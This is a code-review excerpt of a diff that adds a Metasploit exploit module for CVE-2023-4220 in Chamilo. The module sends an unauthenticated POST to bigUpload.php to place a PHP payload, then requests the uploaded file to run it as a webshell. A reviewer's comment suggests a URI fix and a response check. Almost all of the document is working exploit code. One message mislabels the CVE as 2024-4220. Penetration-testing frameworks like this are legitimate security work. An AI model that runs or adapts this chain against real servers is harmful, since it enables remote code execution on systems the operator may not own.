modules/exploits/linux/http/chamilo_bigupload_webshell.rb

```diff
@@ -0,0 +1,118 @@
+          `/main/inc/lib/javascript/bigupload/files/` if the `/files/` directory already exists - it does not exist
+          by default.
+        },
+        'Author' => [
+          'Ngo Wei Lin', # discovery
+          'jheysel-r7'   # module
+        ],
+        'References' => [
+          [ 'URL', 'https://starlabs.sg/advisories/23/23-4220/'],
+          [ 'URL', 'https://github.com/H4cking4All/CVE-2023-4220/tree/main'],
+          [ 'CVE', '2023-4220']
+        ],
+        'License' => MSF_LICENSE,
+        'Platform' => %w[php],
+        'Privileged' => false,
+        'Arch' => [ ARCH_PHP ],
+        'Targets' => [
+          [
+            'PHP',
+            {
+              'Platform' => ['php'],
+              'Arch' => ARCH_PHP
+            }
+          ],
+        ],
+        'DisclosureDate' => '2023-11-28',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/main/inc/lib/javascript/bigupload/files/')
+    )
+
+    return CheckCode::Safe('The directory /main/inc/lib/javascript/bigupload/files/ does not exist on the target') if res&.code == 404
+
+    print_good('The directory /main/inc/lib/javascript/bigupload/files/ exists on the target indicating the target is vulnerable.')
+    test_file_content = rand_text_alphanumeric(8)
+    test_file_name = rand_text_alphanumeric(8)
+
+    begin
+      upload_file(test_file_content, test_file_name)
+    rescue UploadFileError => e
+      return CheckCode::Safe("#{e.class}:#{e}")
+    end
+
+    CheckCode::Vulnerable('File upload was successful (CVE-2024-4220 was exploited successfully).')
+  end
+
+  def upload_file(file_contents, file_name)
+    vars_form_data = [
+      {
+        'name' => 'bigUploadFile',
+        'data' => file_contents,
+        'filename' => file_name,
+        'mime_type' => 'application/octet-stream'
+      }
+    ]
+
+    register_file_for_cleanup(file_name)
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/main/inc/lib/javascript/bigupload/inc/bigUpload.php'),
+      'vars_form_data' => vars_form_data,
+      'vars_get' => {
+        'action' => 'post-unsupported'
+      }
+    )
+
+    raise UploadFileError, 'The file upload failed.' unless res&.code == 200 && res&.body == 'The file has successfully been uploaded.'
+  end
+
+  def exploit
+    file_contents = payload.encoded
+    file_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"
+
+    begin
+      upload_file(file_contents, file_name)
+    rescue UploadFileError => e
+      fail_with(Failure::UnexpectedReply, "#{e.class}:#{e}")
+    end
+
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => "/main/inc/lib/javascript/bigupload/files/#{file_name}"
```

Comment:
Looks like this is missing a `normalize_uri` call here. Also given hat we're executing the payload, should here be some kind of a check done on the result? Something to ensure that the HTTP server responded at least would be a good idea.

```suggestion
      'uri' => normalize_uri('/main/inc/lib/javascript/bigupload/files', file_name)
```